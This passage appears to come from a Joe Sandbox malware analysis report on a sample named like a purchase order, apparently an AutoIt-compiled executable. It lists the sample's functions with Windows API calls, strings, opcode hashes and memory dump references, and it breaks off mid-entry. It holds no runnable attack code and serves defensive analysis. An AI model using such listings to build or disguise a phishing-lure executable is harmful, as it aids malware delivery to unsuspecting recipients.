                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: LogonUser
                      • String ID:
                      • API String ID: 1244722697-0
                      • Opcode ID: d67177034616d48d4a6669edf9053b6187066b9d69e06a2fa2acae3d9c64359c
                      • Instruction ID: 85f58b21915ded54f1f52474c069008f431a8bca7844fa380cb09e04ce30c03f
                      • Opcode Fuzzy Hash: d67177034616d48d4a6669edf9053b6187066b9d69e06a2fa2acae3d9c64359c
                      • Instruction Fuzzy Hash: 8CD09E321A465EAEDF029FA4DC06EAE3F6AEB04701F448511FA15D60A1C675D531AB50
                      Function 00B0C146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: NameUser
                      • String ID:
                      • API String ID: 2645101109-0
                      • Opcode ID: 9fa710fe7d025bde14b4c459a55ac2628196f2902ba0d42336b0bd851ca3d75d
                      • Instruction ID: 87dfa2463cdca0e7c2ec34415b72bb7120d73d1e56b962faad02162a9b664262
                      • Opcode Fuzzy Hash: 9fa710fe7d025bde14b4c459a55ac2628196f2902ba0d42336b0bd851ca3d75d
                      • Instruction Fuzzy Hash: 15C04CB140400DDFC715CB80C989DEFB7BCBB08300F104095A115E2040DB709B459B71
                      Function 00AB8E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                      Download Yara Rule
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00AB8E1F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: 3e27e88905a2393eb9ec4096fd91c93afe6810c1a521af9cc91dc54a50c41df6
                      • Instruction ID: 13f71073e4ea7e2e3f1ceaa3f620c2e4bcd29c809b0b408e686cb78b51cca6fb
                      • Opcode Fuzzy Hash: 3e27e88905a2393eb9ec4096fd91c93afe6810c1a521af9cc91dc54a50c41df6
                      • Instruction Fuzzy Hash: 4BA0123000050CA78A001B51FC044847F6CD7041507408010F41C01021CB3354104585
                      Function 00ABA937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00AB6AE9,00B467D8,00000014), ref: 00ABA937
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: HeapProcess
                      • String ID:
                      • API String ID: 54951025-0
                      • Opcode ID: cf4aaa9ff2071ebacdb6ef3805598f9ceefcf21614f97d20890965d8d7f8e10f
                      • Instruction ID: 5b536f11215bb9542e2cdb5f415b0246551fd94a314fb2a4c07a4eec43c1329f
                      • Opcode Fuzzy Hash: cf4aaa9ff2071ebacdb6ef3805598f9ceefcf21614f97d20890965d8d7f8e10f
                      • Instruction Fuzzy Hash: 0DB012F07032034BD7084B3CAC5429E39D45789202341807D7403C3560DF308420DF00
                      Function 00AB0EC4 Relevance: .3, Instructions: 345COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                      • Instruction ID: 422c92e37a84fd0bd7deeea60af2656a1df043facff242247779199923cc39da
                      • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                      • Instruction Fuzzy Hash: 16C1C27220529349DF2D473EC4348BFBEA95AA27F131A0B6DD4B3CB4C6EE24D564D620
                      Function 00AB12F9 Relevance: .3, Instructions: 341COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                      • Instruction ID: 57c9843a5601d4003124a0c714c95ce547aa97613b7c8f12504ec73d9915d870
                      • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                      • Instruction Fuzzy Hash: 6DC1C3722052934ADF2D4739C4348BFBFA95AA27B131A476DD8B3CB4C6FE24D524D620
                      Function 00AB0A8F Relevance: .3, Instructions: 331COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                      • Instruction ID: 321bdefa8d69cb18231f7c36d33f3eef4872f4d040a2632cbff053298a6f738a
                      • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                      • Instruction Fuzzy Hash: BFC1B17220529349DF2D473984348BFBFA95AA27F531A4B6DD4B3CB4C2EE24D524D620
                      Function 00AB0677 Relevance: .3, Instructions: 323COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                      • Instruction ID: 161bb9a8234e8b02c13c3217c585bea901b04d7b018ca4cb88b7f9c96a5b7127
                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                      • Instruction Fuzzy Hash: D1C1D27220529349DF2D473984348BFFFA95EA27B131A4B6DD4B3CB4C2EE24D564C660
                      Function 00AEA750 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                      Download Yara Rule
                      APIs
                      • DeleteObject.GDI32(00000000), ref: 00AEA7A5
                      • DeleteObject.GDI32(00000000), ref: 00AEA7B7
                      • DestroyWindow.USER32 ref: 00AEA7C5
                      • GetDesktopWindow.USER32 ref: 00AEA7DF
                      • GetWindowRect.USER32(00000000), ref: 00AEA7E6
                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00AEA927
                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00AEA937
                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEA97F
                      • GetClientRect.USER32(00000000,?), ref: 00AEA98B
                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00AEA9C5
                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEA9E7
                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEA9FA
                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAA05
                      • GlobalLock.KERNEL32(00000000), ref: 00AEAA0E
                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAA1D
                      • GlobalUnlock.KERNEL32(00000000), ref: 00AEAA26
                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAA2D
                      • GlobalFree.KERNEL32(00000000), ref: 00AEAA38
                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAA4A
                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00B1D9BC,00000000), ref: 00AEAA60
                      • GlobalFree.KERNEL32(00000000), ref: 00AEAA70
                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00AEAA96
                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00AEAAB5
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAAD7
                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEACC4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                      • String ID: $AutoIt v3$DISPLAY$static
                      • API String ID: 2211948467-2373415609
                      • Opcode ID: 5e403b6aa7440d71c0c3f794ec388c4c512adda640f42573a1be2c374f4e1ebb
                      • Instruction ID: b91cc3d18dbd3ee4cac60cb7cb84185954c7f2b18228e246bbd3e2a4069d16f8
                      • Opcode Fuzzy Hash: 5e403b6aa7440d71c0c3f794ec388c4c512adda640f42573a1be2c374f4e1ebb
                      • Instruction Fuzzy Hash: 6302AD71A00254EFDB14DFA9CD89EAE7BB9FF48310F148559F905AB2A1DB30AD41CB60
                      Function 00AFD095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                      Download Yara Rule
                      APIs
                      • SetTextColor.GDI32(?,00000000), ref: 00AFD0EB
                      • GetSysColorBrush.USER32(0000000F), ref: 00AFD11C
                      • GetSysColor.USER32(0000000F), ref: 00AFD128
                      • SetBkColor.GDI32(?,000000FF), ref: 00AFD142
                      • SelectObject.GDI32(?,00000000), ref: 00AFD151
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00AFD17C
                      • GetSysColor.USER32(00000010), ref: 00AFD184
                      • CreateSolidBrush.GDI32(00000000), ref: 00AFD18B
                      • FrameRect.USER32(?,?,00000000), ref: 00AFD19A
                      • DeleteObject.GDI32(00000000), ref: 00AFD1A1
                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00AFD1EC
                      • FillRect.USER32(?,?,00000000), ref: 00AFD21E
                      • GetWindowLongW.USER32(?,000000F0), ref: 00AFD249
                        • Part of subcall function 00AFD385: GetSysColor.USER32(00000012), ref: 00AFD3BE
                        • Part of subcall function 00AFD385: SetTextColor.GDI32(?,?), ref: 00AFD3C2
                        • Part of subcall function 00AFD385: GetSysColorBrush.USER32(0000000F), ref: 00AFD3D8
                        • Part of subcall function 00AFD385: GetSysColor.USER32(0000000F), ref: 00AFD3E3
                        • Part of subcall function 00AFD385: GetSysColor.USER32(00000011), ref: 00AFD400
                        • Part of subcall function 00AFD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AFD40E
                        • Part of subcall function 00AFD385: SelectObject.GDI32(?,00000000), ref: 00AFD41F
                        • Part of subcall function 00AFD385: SetBkColor.GDI32(?,00000000), ref: 00AFD428
                        • Part of subcall function 00AFD385: SelectObject.GDI32(?,?), ref: 00AFD435
                        • Part of subcall function 00AFD385: InflateRect.USER32(?,000000FF,000000FF), ref: 00AFD454
                        • Part of subcall function 00AFD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AFD46B
                        • Part of subcall function 00AFD385: GetWindowLongW.USER32(00000000,000000F0), ref: 00AFD480
                        • Part of subcall function 00AFD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AFD4A8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                      • String ID:
                      • API String ID: 3521893082-0
                      • Opcode ID: ed28b4e17951ccfd61cfd6e9c74bb8bf920c8117c1ef1f47f59ebae02f5bccac
                      • Instruction ID: 43981bdc3efab0ab6491cb012e8db46238192b20cf5fceadac71b84b53072913
                      • Opcode Fuzzy Hash: ed28b4e17951ccfd61cfd6e9c74bb8bf920c8117c1ef1f47f59ebae02f5bccac
                      • Instruction Fuzzy Hash: 2A918072008305BFC7119F64DC08EAB7BAAFF89320F504A19FA62A71E0DB75D944CB52
                      Function 00A948C8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                      Download Yara Rule
                      APIs
                      • DestroyWindow.USER32 ref: 00A94956
                      • DeleteObject.GDI32(00000000), ref: 00A94998
                      • DeleteObject.GDI32(00000000), ref: 00A949A3
                      • DestroyIcon.USER32(00000000), ref: 00A949AE
                      • DestroyWindow.USER32(00000000), ref: 00A949B9
                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B0E179
                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B0E1B2
                      • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00B0E5E0
                        • Part of subcall function 00A949CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A94954,00000000), ref: 00A94A23
                      • SendMessageW.USER32 ref: 00B0E627
                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B0E63E
                      • ImageList_Destroy.COMCTL32(00000000), ref: 00B0E654
                      • ImageList_Destroy.COMCTL32(00000000), ref: 00B0E65F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                      • String ID: 0
                      • API String ID: 464785882-4108050209
                      • Opcode ID: b470d1b4fce7b52af6a4ca35b01b8c3f7cb278cea8a82eeb87f9486b812ffeb0
                      • Instruction ID: 3fc1a4552afdd381dc3c70f51ce26b04ad19cd12aaa3f6d34fd95b77971ee4ad
                      • Opcode Fuzzy Hash: b470d1b4fce7b52af6a4ca35b01b8c3f7cb278cea8a82eeb87f9486b812ffeb0
                      • Instruction Fuzzy Hash: 62128030604201DFDB25CF14C984BAABBE5FF59304F5449A9F9A9DB2A2C731EC46CB91
                      Function 00AEA3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                      Download Yara Rule
                      APIs
                      • DestroyWindow.USER32(00000000), ref: 00AEA42A
                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00AEA4E9
                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00AEA527
                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00AEA539
                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00AEA57F
                      • GetClientRect.USER32(00000000,?), ref: 00AEA58B
                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00AEA5CF
                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AEA5DE
                      • GetStockObject.GDI32(00000011), ref: 00AEA5EE
                      • SelectObject.GDI32(00000000,00000000), ref: 00AEA5F2
                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00AEA602
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AEA60B
                      • DeleteDC.GDI32(00000000), ref: 00AEA614
                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00AEA642
                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00AEA659
                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00AEA694
                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00AEA6A8
                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00AEA6B9
                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00AEA6E9
                      • GetStockObject.GDI32(00000011), ref: 00AEA6F4
                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00AEA6FF
                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00AEA709
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                      • API String ID: 2910397461-517079104
                      • Opcode ID: 34d8a581de65cfaea2ef76a0a4673b4a4e78f3fb1e0f796fbf009326cd185273
                      • Instruction ID: 0bb073e0745a0ebc1031e239ce3d6e92ed1449a3ec959fb1425170b5021cd54c
                      • Opcode Fuzzy Hash: 34d8a581de65cfaea2ef76a0a4673b4a4e78f3fb1e0f796fbf009326cd185273
                      • Instruction Fuzzy Hash: 7FA17071A00215BFEB14DBA9DD4AFAE7BB9EB44711F008555F614EB2E0DBB0AD40CB60
                      Function 00ADE44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00ADE45E
                      • GetDriveTypeW.KERNEL32(?,00B2DC88,?,\\.\,00B2DBF0), ref: 00ADE54B
                      • SetErrorMode.KERNEL32(00000000,00B2DC88,?,\\.\,00B2DBF0), ref: 00ADE6B1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorMode$DriveType
                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                      • API String ID: 2907320926-4222207086
                      • Opcode ID: e584f982e32acc97f86fb0ab77de6751f2ec1eda827c4a134a224416ad5c8100
                      • Instruction ID: 25d41faca3a50b036e1525b635323de7b8afa6a4ca38cede801ac73139356fd6
                      • Opcode Fuzzy Hash: e584f982e32acc97f86fb0ab77de6751f2ec1eda827c4a134a224416ad5c8100
                      • Instruction Fuzzy Hash: 9651B330208341ABC600FF14C9D1969B7F1EBA4B44B64895BF447AF3E2DB60DF45EA42
                      Function 00A9C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __wcsnicmp
                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                      • API String ID: 1038674560-86951937
                      • Opcode ID: e1794ba5c8d24d92c65fc1548913bc52465ad79ae1a84e3accc6835f1e6e85ff
                      • Instruction ID: 64252625bfc45a6d79bc1907b212cc2475de204a495fc6a5f3ae00d06746d538
                      • Opcode Fuzzy Hash: e1794ba5c8d24d92c65fc1548913bc52465ad79ae1a84e3accc6835f1e6e85ff
                      • Instruction Fuzzy Hash: D7613631740B217BDF21EB64AD82FBA33ECAF15750F144065F846AA5D7EBA0DA01C7A1
                      Function 00AFC4F9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                      Download Yara Rule
                      APIs
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00AFC598
                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00AFC64E
                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 00AFC669
                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00AFC925
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
